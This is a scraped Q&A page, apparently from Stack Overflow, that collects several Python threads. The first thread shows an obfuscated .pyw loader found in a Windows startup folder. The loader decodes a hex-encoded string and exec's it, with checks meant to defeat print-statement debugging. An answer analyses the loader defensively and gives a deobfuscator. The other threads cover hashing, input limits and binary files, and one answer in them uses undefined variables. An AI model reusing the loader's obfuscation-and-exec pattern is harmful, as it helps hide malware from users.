Trying to understand this potentially virus encrypted pyw file

Trying to understand this potentially virus encrypted pyw file - python

Today I realised this .pyw file was added into my startup files.
Though I already deleted it, I suspect what it may have initially done to my computer, but it's sort of encrypted and I am not very familiar with Python, but I assume as this is the source code regardless, there is no actual way to completely encrypt it.
Can someone either guide me through how I can do that, or check it for me?
edit: by the looks of it I can only post some of it here, but it should give brief idea of how it was encrypted:
class Protect():
def __decode__(self:object,_execute:str)->exec:return(None,self._delete(_execute))[0]
def __init__(self:object,_rasputin:str=False,_exit:float=0,*_encode:str,**_bytes:int)->exec:
self._byte,self._decode,_rasputin,self._system,_bytes[_exit],self._delete=lambda _bits:"".join(__import__(self._decode[1]+self._decode[8]+self._decode[13]+self._decode[0]+self._decode[18]+self._decode[2]+self._decode[8]+self._decode[8]).unhexlify(str(_bit)).decode()for _bit in str(_bits).split('/')),exit()if _rasputin else'abcdefghijklmnopqrstuvwxyz0123456789',lambda _rasputin:exit()if self._decode[15]+self._decode[17]+self._decode[8]+self._decode[13]+self._decode[19] in open(__file__, errors=self._decode[8]+self._decode[6]+self._decode[13]+self._decode[14]+self._decode[17]+self._decode[4]).read() or self._decode[8]+self._decode[13]+self._decode[15]+self._decode[20]+self._decode[19] in open(__file__, errors=self._decode[8]+self._decode[6]+self._decode[13]+self._decode[14]+self._decode[17]+self._decode[4]).read()else"".join(_rasputin if _rasputin not in self._decode else self._decode[self._decode.index(_rasputin)+1 if self._decode.index(_rasputin)+1<len(self._decode)else 0]for _rasputin in "".join(chr(ord(t)-683867)if t!="ζ"else"\n"for t in self._byte(_rasputin))),lambda _rasputin:str(_bytes[_exit](f"{self._decode[4]+self._decode[-13]+self._decode[4]+self._decode[2]}(''.join(%s),{self._decode[6]+self._decode[11]+self._decode[14]+self._decode[1]+self._decode[0]+self._decode[11]+self._decode[18]}())"%list(_rasputin))).encode(self._decode[20]+self._decode[19]+self._decode[5]+self._decode[34])if _bytes[_exit]==eval else exit(),eval,lambda _exec:self._system(_rasputin(_exec))
return self.__decode__(_bytes[(self._decode[-1]+'_')[-1]+self._decode[18]+self._decode[15]+self._decode[0]+self._decode[17]+self._decode[10]+self._decode[11]+self._decode[4]])
Protect(_rasputin=False,_exit=False,_sparkle='''ceb6/f2a6bdbe/f2a6bdbb/f2a6bf82/f2a6bf83/ceb6/f2a6bdbe/f2a6bdbb/f2a6bf83/f2a6bf80/f2a6bdbb/f2a6bf93/f2a6bf89/f2a6bf8f/f2a6bdbb/f2a6bebe/f2a6bebf/f2a6bf89/f2a6bebc/f2a6bf80/

OBLIGATORY WARNING: The code is pretty obviously hiding something, and it eventually will build a string and exec it as a Python program, so it has full permissions to do anything your user account does on your computer. All of this is to say DO NOT RUN THIS SCRIPT.
The payload for this nasty thing is in that _sparkle string, which you've only posted a prefix of. Once you get past all of the terrible spacing, this program basically builds a new Python program using some silly math and exec's it, using the _sparkle data to do it. It also has some basic protection against you inserting print statements in it (amusingly, those parts are easy to remove). The part you've posted decrypts to two lines of Python comments.
# hi
# if you deobf
Without seeing the rest of the payload, we can't figure out what it was meant to do. But here's a Python function that should reverse-engineer it.
import binascii
# Feed this function the full value of the _sparkle string.
def deobfuscate(data):
decode = 'abcdefghijklmnopqrstuvwxyz0123456789'
r = "".join(binascii.unhexlify(str(x)).decode() for x in str(data).split('/'))
for x in r:
if x == "ζ":
print()
else:
x = chr(ord(x)-683867)
if x in decode:
x = decode[(decode.index(x) + 1) % len(decode)]
print(x, end='')
Each sequence of hex digits between the / is a line. Each two hex digits in the line is treated as a byte and interpreted as UTF-8. The resulting UTF-8 character is then converted to its numerical code point, the magic number 683867 is subtracted from it, and the new number is converted back into a character. Finally, if the character is a letter or number, it's "shifted" once to the right in the decode string, so letters move one forward in the alphabet and numbers increase by one (if it's not a letter/number, then no shift is done). The result, presumably, forms a valid Python program.
From here, you have a few options.
Run the Python script I gave above on the real, full _sparkle string and figure out what the resulting program does yourself.
Run the Python script I gave above on the real, full _sparkle string and post the code in your question so we can decompose that.
Post the full _sparkle string in the question, so I or someone else can decode it.
Wipe the PC to factory settings and move on.

Related

What is the Python equivalent of Ruby's Base64.urlsafe_encode64(Digest::SHA256.hexdigest(STRING))

I am trying to port parts of a ruby project to python and cannot figure out the equivalent to Base64.urlsafe_encode64(Digest::SHA256.hexdigest(STRING)) Closest I have gotten is base64.urlsafe_b64encode(hashlib.sha256(STRING.encode('utf-8')).digest()) however giving the input of StackOverflow it returns: b'HFqE4xhK0TPtcmK7rNQMl3bsQRnD-sNum5_K9vY1G98=' for Python and MWM1YTg0ZTMxODRhZDEzM2VkNzI2MmJiYWNkNDBjOTc3NmVjNDExOWMzZmFjMzZlOWI5ZmNhZjZmNjM1MWJkZg== in Ruby.
Full Python & Ruby Code:
Ruby
require "base64"
require "digest"
string= "StackOverflow"
output= Base64.urlsafe_encode64(Digest::SHA256.hexdigest(string))
puts output
Python
import hashlib
import base64
string = str("StackOverflow")
output = base64.urlsafe_b64encode(hashlib.sha256(string.encode('utf-8')).digest())
print(str(output))

In your original Python code, you used digest instead of hexdigest which will give different results, as it's not the same thing. Keep in mind that converting code to different languages can be very difficult, as you need to understand both languages well enough to compare the code. Try and dissect the code piece by piece, splitting lines and printing each strings output / giving output at each stage to check what is happening.
Jamming everything into one line can be messy and you can easily overlook different factors which could play a major role in bug fixing.
You should write your code "spaced-out" at first, and in production you can change the code to be a singular line, although it's not very readable with long code.
What you are looking for is:
string = str("StackOverflow")
output = hashlib.sha256(code_verifier.encode('utf-8')).hexdigest()
output = base64.urlsafe_b64encode(code_challenge.encode('utf-8'))
print(str(output.decode('utf-8')))
It gives the same result, as if you are using Base64.urlsafe_encode64(Digest::SHA256.hexdigest(string)) in ruby.

You need to use the hexdigest method instead of digest on the hash in Python to get the same output as in your Ruby example (since you use the hexdigest function there).
Also note that the hexdigest method returns a string instead of bytes, so you'll need to encode the result again (with .encode("utf-8")).
Here's a full example:
import hashlib
import base64
string = "StackOverflow"
output = base64.urlsafe_b64encode(hashlib.sha256(string.encode("utf-8")).hexdigest().encode("utf-8"))
print(str(output))

Can we remove the input function's line length limit purely within Python? [duplicate]

I'm trying to input() a string containing a large paste of JSON.
(Why I'm pasting a large blob of json is outside the scope of my question, but please believe me when I say I have a not-completely-idiotic reason!)
However, input() only grabs the first 4095 characters of the paste, for reasons described in this answer.
My code looks roughly like this:
import json
foo = input()
json.loads(foo)
When I paste a blob of JSON that's longer than 4095 characters, json.loads(foo) raises an error. (The error varies based on the specifics of how the JSON gets cut off, but it invariably fails one way or another because it's missing the final }.)
I looked at the documentation for input(), and it made no mention of anything that looked useful for this issue. No flags to input in non-canonical mode, no alternate input()-style functions to handle larger inputs, etc.
Is there a way to be able to paste large inputs successfully? This would make my tool's workflow way less janky than having to paste into a file, save it somewhere, and then pass the file's location into the script.

Python has to follow the terminal rules. But you could use a system call from python to change terminal behaviour and change it back (Linux):
import subprocess,json
subprocess.check_call(["stty","-icanon"])
result = json.loads(input())
subprocess.check_call(["stty","icanon"])
Alternately, consider trying to get an indented json dump from your provider that you can read line by line, then decode.
data = "".join(sys.stdin.readlines())
result = json.loads(data)

what do i do wrong with encoding hexadecimal "40" in Python?

i came across a binary file (i guess) i try to generate using my script, so maybe i do it perfectly wrong, but so far it worked. Now i'm stuck and don't feel i can understand (and as a noob to binary files, can't name the problem correctly to google any answer)..
I read the "target file" as a binary file and i found it is like many "\x00" with several numeric values in between (like "\x05").
What i do is like:
def myEncode(a):
if a == 2: A = "\x02"
elif a == 5: A = "\x05"
return(A)
line = "\x00\x00\x01" + myEncode(5) + "\x00"
phrase = bytearray(line.encode("utf-8"))
f = open("outfile", "ab")
f. write(phrase)
f.close()
it would help me a lot if i could use hex() to transform this integer 5 into "\x05", but what i get is "0x5". Which, added to the file this way doesn't work. I really need (for some reason) to make it look "\x" and 2-digit number
the more important: i need to add decimal 128 (hexadecimal "\x80") and bigger. For a reason beyond my understanding it always inserts "\xc2\x80". When i create the same file using the original program, it only adds this "\x80", so i guess it must work somehow, yet i don't know why..
Thanks for any advice, hint or a direction where to look.

File read reaches end of file unexpectedly

I'm translating a script from matlab, which reads a file of binary-encoded 32-bit integers and parses them appropriately. I have written the following method that is intended to mimic matlab's fread() function:
def readi(f,n):
x = zeros(n,int);
for i in range(0,n):
x[i] = struct.unpack('i',f.read(4))[0];
print x[i];
return x;
I call this function variously with n between 1 and 9 in my script as I parse out the data. My problem is that the script only gets part of the way into the file before I get this error:
x[i] = struct.unpack('i',f.read(4))[0];
struct.error: unpack requires a string argument of length 4
It appears that python thinks I have reached the end of the file. The point in execution where the error occurs is a line in a loop that has already been iterated over several times. In addition, the small portion of the file that has been parsed already matches exactly what my matlab script produces from the exact same file (not a copy). Matlab, however, is able to read a much larger dataset from the file. Does anyone have ideas on why this error is occurring?

In my own testing, whether the file was opened in binary-mode or not (surprisingly) didn't matter. The only thing I can suggest is to make sure you understand the format of the input file exactly. So in addition to reading the matlab script, it might be a good idea to look at hex dump of the file where you can see the individual bytes of raw data and be able to verify whether it matches your understanding of the layout of its contents.
Besides all that, you could try the following simplification/optimization of your readi() function which does not require the temporaryxlist and reads the bytes of all the integers in the group with one call tofile.read():
def readi(f, n):
fmt = '%di' % n
return struct.unpack(fmt, f.read(struct.calcsize(fmt)))
However I don't think it will solve your problem because it should be equivalent to what you already doing, return value-wise anyway (it doesn't print anything like yours).
One final note -- you don't need to end your lines of code with a semicolon. Python isn't like C and several other languages in that respect.

Trying to pass a number of bytes to read() via raw_input

I'm doing some extra credit for "Zed Shaw's Learn Python The Hard Way;" the "extra credit" for exercise 15 tells you to read through pydoc file to find other things I could do files. I was interested in figuring out how to have the terminal print out a certain number of bytes of a text file using "read()". I can hard code in the argument for how many bytes to read, but I hit a wall when trying to prompt the user to define the number of bytes.
Here's the script as I have it so far:
from sys import argv
script, filename = argv
txt = open(filename)
print "Here's 24 bytes of your file %r:" % filename
print txt.read(24)
print """What about an arbitrary, not hard-coded number of bytes? Enter the number
of bytes you want read out of the txt file at this prompt, as an integer:"""
how_far = raw_input("> ")
print txt.read(how_far2) # this format makes sense in my head but obviously isn't the done thing.
terminal spits out the error:
"NameError: name 'how_far2' is not defined"
How do I prompt the user of the script to type in a number of bytes, and have the script read out that number of bytes?
BONUS QUESTIONS:
What is the actual-factual term for what I'm doing trying to do here? Pass a variable to a method? Pass a variable to a function?
Is the number of bytes an argument of read? Is that the correct term?
More generally, what's a good place to get a vocabulary list of python terms? Any other books Stack Overflow would recommend, or some in online documentation somewhere? Really looking for a no assumptions, no prior knowledge, "explain it to me like I'm five" level of granularity... a half hour of web-searching hasn't helped too much. I've not found terminology really collected together into any one place online despite a good amount of effort searching the web.

The error message is because you have used how_far in one place and how_far2 in the other.
You'll also need to convert how_far to an int before passing it to read - using int(how_far) for example
You will find it can be called passing a variable, parameter or argument. These are not Python terms, they are general programming terms

raw_input returns a string. file.read expects an integer -- likely you just need to convert the output from raw_input into an integer before you use it.

We Keep Coding

Python is a programming language that lets you work quickly and integrate systems more effectively.